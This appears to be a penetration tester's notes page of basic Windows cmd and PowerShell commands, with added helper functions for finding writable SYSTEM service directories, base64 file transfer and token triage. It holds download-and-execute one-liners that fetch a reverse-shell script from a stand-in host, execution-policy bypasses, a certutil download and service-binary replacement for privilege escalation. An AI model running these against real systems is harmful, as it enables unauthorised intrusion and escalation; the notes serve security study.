Basic Command

The basics of Command Prompt and PowerShell

Last updated 7 months ago

This note was created when I was not very familiar with the Windows environment. I didn't know how to restart the machine from the command line, copy files, or import PowerShell scripts, etc.

Basic PowerShell

Start PowerShell with the execution policy bypassed (applies to that process only):

powershell -ep bypass

Or, if you are already inside a PowerShell session, set the execution policy with this command:

Set-ExecutionPolicy Bypass -Scope CurrentUser

Note that -Scope CurrentUser writes the policy to the user's registry hive, so it persists across sessions and is visible to defenders; -Scope Process affects only the current session. The execution policy is a safety feature, not a security boundary, so bypassing it grants no extra privilege.

Load a PowerShell script's functions into the current session with dot sourcing (note the leading dot and space):

. .\PowerView.ps1

Import a module (here the PowerSploit manifest) into PowerShell:

Import-Module .\PowerSploit.psd1

Check Available PowerShell Commands

Filter by name to confirm that a dot-sourced script or imported module actually registered its functions, or list every command the session knows about:

Get-Command -Name "*Invoke*"
Get-Command

Copy & Move

How to copy file:

copy source.exe destination.exe

How to copy directory:

xcopy C:\source_dir D:\dest_dir /E /I /Y

Explanation:

  • /E – Copies all subdirectories, including empty ones.

  • /I – If the destination does not exist and copying more than one file, this option assumes that the destination must be a directory.

  • /Y – Suppresses prompting to confirm you want to overwrite an existing destination file.

How to move a file or directory:

move payload.exe C:\temp\service.exe

Rename

Sometimes, after finding a service that runs as SYSTEM and whose binary directory is writable by a low-privileged user, you can drop a payload into that directory and rename it to match the service binary name. Check the file's own ACL first (icacls on the binary): write access to the directory lets you plant a new file, but replacing the existing binary needs write or delete rights on the file itself, and the payload only runs when the service restarts.

ren Payload.exe Service.exe
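The check described above, automated: an added example (not from the original notes) that lists services running as LocalSystem whose binary directory the current user can write to. It assumes nothing host-specific; service names and paths come from the host. The probe creates and deletes an empty file, which is reliable but leaves a trace on monitored hosts.

```powershell
# Added example: find LocalSystem services whose binary directory the
# current user can write to. Not part of the original notes.

function Get-WritableSystemService {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            # PathName may contain environment variables, quotes and arguments;
            # reduce it to the executable path only.
            $raw = [Environment]::ExpandEnvironmentVariables($_.PathName)
            if ($raw.StartsWith('"')) {
                $exe = $raw.Split('"')[1]            # quoted: take the text between the quotes
            } else {
                $exe = $raw -replace '^(.+?\.exe).*$', '$1'   # unquoted: keep up to the .exe
            }

            $dir = Split-Path -Path $exe -Parent
            if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }

            # Probe write access by creating and deleting a temp file.
            # ACL inspection alone misses deny ACEs and inherited rights.
            $probe    = Join-Path $dir ('.' + [guid]::NewGuid().ToString('N'))
            $writable = $false
            try {
                [IO.File]::WriteAllText($probe, '')
                Remove-Item -LiteralPath $probe -Force
                $writable = $true
            } catch { }

            if ($writable) {
                [pscustomobject]@{
                    Service   = $_.Name
                    State     = $_.State
                    StartMode = $_.StartMode
                    Binary    = $exe
                    Directory = $dir
                }
            }
        }
}

Get-WritableSystemService | Format-Table -AutoSize
```

A hit here means you can plant a file next to the service binary, not necessarily overwrite the binary; follow up with icacls on the Binary path. The unquoted-path branch keeps everything up to the first ".exe", so a path with spaces still resolves to its real directory; whether the unquoted path itself is exploitable is covered on the Unquoted Service Path page.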

Download

certutil.exe (widely known to AV/EDR as a download technique, so expect it to be flagged):

certutil -urlcache -split -f https://example.com/example.txt example.txt

powershell.exe: Invoke-WebRequest (on Windows PowerShell 5.1, add -UseBasicParsing if the command hangs on Internet Explorer's first-run configuration):

iwr -Uri "http://172.16.8.1:9005/PowerView.ps1" -OutFile "PowerView.ps1"

Download and Execute

powershell.exe: Invoke-Expression (downloads the script as a string and runs it without touching disk)

iex ((New-Object Net.WebClient).DownloadString('http://example.local/Invoke-PowerShellTcpOneLine.ps1'))

Or, from cmd.exe into powershell.exe (-NoP is short for -NoProfile, so no profile script runs first):

powershell.exe -NoP -ExecutionPolicy Bypass -Command "iex ((New-Object Net.WebClient).DownloadString('http://example.local/Invoke-PowerShellTcpOneLine.ps1'))"

Or, use start /B to run the command in the background so the current shell is not blocked:

start /B powershell.exe -NoP -ExecutionPolicy Bypass -Command "iex ((New-Object Net.WebClient).DownloadString('http://example.local/Invoke-PowerShellTcpOneLine.ps1'))"

Restart and Shutdown

Shutdown now (/t 0 means no delay, /f forces running applications to close):

shutdown /s /t 0 /f

Restart now:

shutdown /r /t 0 /f

Convert to Base64

[convert]::ToBase64String((Get-Content -path "20230908145747_BloodHound.zip" -Encoding byte))

This works on Windows PowerShell 5.1 only: PowerShell 7 removed -Encoding byte from Get-Content (it uses -AsByteStream instead), while [IO.File]::ReadAllBytes works on both.
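A version-independent round trip, as an added example that is not from the original notes: it encodes a file to base64 for copy-paste transfer, decodes it back, and verifies the SHA-256 on both ends so a truncated paste is caught. The file name is the BloodHound archive from the note above; any file works.

```powershell
# Added example: base64 encode/decode with integrity check. Not part of the
# original notes. Uses [IO.File] so it runs on Windows PowerShell 5.1 and PowerShell 7.

function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    $full  = (Resolve-Path -LiteralPath $Path).Path
    $bytes = [IO.File]::ReadAllBytes($full)
    [pscustomobject]@{
        Sha256 = (Get-FileHash -LiteralPath $full -Algorithm SHA256).Hash
        # InsertLineBreaks wraps at 76 characters so terminals and pastebins do not mangle one huge line
        Base64 = [Convert]::ToBase64String($bytes, [Base64FormattingOptions]::InsertLineBreaks)
    }
}

function ConvertFrom-Base64File {
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256
    )
    # .NET resolves relative paths against the process directory, not the PowerShell location
    if (-not [IO.Path]::IsPathRooted($OutFile)) {
        $OutFile = Join-Path (Get-Location).Path $OutFile
    }
    # FromBase64String ignores the line breaks and any whitespace picked up while pasting
    $bytes = [Convert]::FromBase64String($Base64)
    [IO.File]::WriteAllBytes($OutFile, $bytes)

    $hash = (Get-FileHash -LiteralPath $OutFile -Algorithm SHA256).Hash
    if ($ExpectedSha256 -and $hash -ne $ExpectedSha256) {
        throw "Hash mismatch: got $hash, expected $ExpectedSha256 (paste truncated or altered?)"
    }
    $hash
}

# Round trip on one machine to show the flow. On a real engagement, print
# $enc.Sha256 and $enc.Base64 on the target, paste the base64 into a file on
# your box, then decode it there with the hash you noted.
$enc = ConvertTo-Base64File -Path .\20230908145747_BloodHound.zip
$enc.Sha256
ConvertFrom-Base64File -Base64 $enc.Base64 -OutFile .\BloodHound_copy.zip -ExpectedSha256 $enc.Sha256
```

On a Linux attacking box the decode side is simply base64 -d on the pasted file followed by sha256sum; the point is the same: compare the hash against the one printed on the target before trusting the archive.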

Privileges, User, and Groups

Current user, privileges, and group memberships (the switch is /groups; /group is not accepted):

whoami /all
whoami /priv
whoami /groups
net user
net user asuka

Check Local Group using Command Prompt:

net localgroup
net localgroup Administrators

Check group members with PowerShell (Select-Object * also shows the SID and whether each member is a local or domain principal):

Get-LocalGroupMember -Group "Administrators"
Get-LocalGroupMember -Group "Administrators" | Select-Object *
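The questions a practitioner actually asks after landing on a host are whether the token is elevated, whether the user is a local admin whose token UAC has filtered, what integrity level the process runs at, and which privileges are worth chasing. The added example below (not from the original notes) answers them by parsing the CSV output of whoami, which the commands above print as tables. It assumes English whoami output for the "deny only" attribute text, and the privilege shortlist is a triage list, not a complete one.

```powershell
# Added example: token triage from whoami output. Not part of the original notes.

function Get-TokenTriage {
    [CmdletBinding()]
    param()

    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity

    # whoami prints a header row with /fo csv, so ConvertFrom-Csv yields objects
    # with columns "Group Name","Type","SID","Attributes" and
    # "Privilege Name","Description","State" respectively.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $privs  = whoami /priv   /fo csv | ConvertFrom-Csv

    # BUILTIN\Administrators is always S-1-5-32-544; integrity labels are S-1-16-*
    $adminEntry     = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    $integrityEntry = $groups | Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1

    # Privileges commonly abused for local privilege escalation (assumed shortlist).
    $interesting = @(
        'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
        'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege',
        'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege',
        'SeManageVolumePrivilege', 'SeTcbPrivilege', 'SeCreateTokenPrivilege'
    )
    $hits = $privs | Where-Object { $interesting -contains $_.'Privilege Name' }

    [pscustomobject]@{
        User               = $identity.Name
        IntegrityLevel     = $integrityEntry.'Group Name'
        # IsInRole(Administrator) is true only when the token is actually elevated
        IsElevated         = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        InAdministrators   = [bool]$adminEntry
        # UAC keeps the group in the token but marks it "used for deny only";
        # that is the case where the UAC Bypass page applies
        AdminTokenFiltered = [bool]$adminEntry -and ($adminEntry.Attributes -match 'deny only')
        NotablePrivileges  = ($hits | ForEach-Object { "$($_.'Privilege Name') [$($_.State)]" }) -join ', '
    }
}

Get-TokenTriage | Format-List
```

A privilege listed as Disabled is still held by the token; tooling that uses it (backup, impersonation, debug) enables it at runtime, so treat Disabled entries as real. If InAdministrators is true but IsElevated is false, you are in a medium-integrity admin session and need a UAC bypass or a "Run as administrator" equivalent before the Administrators membership does anything.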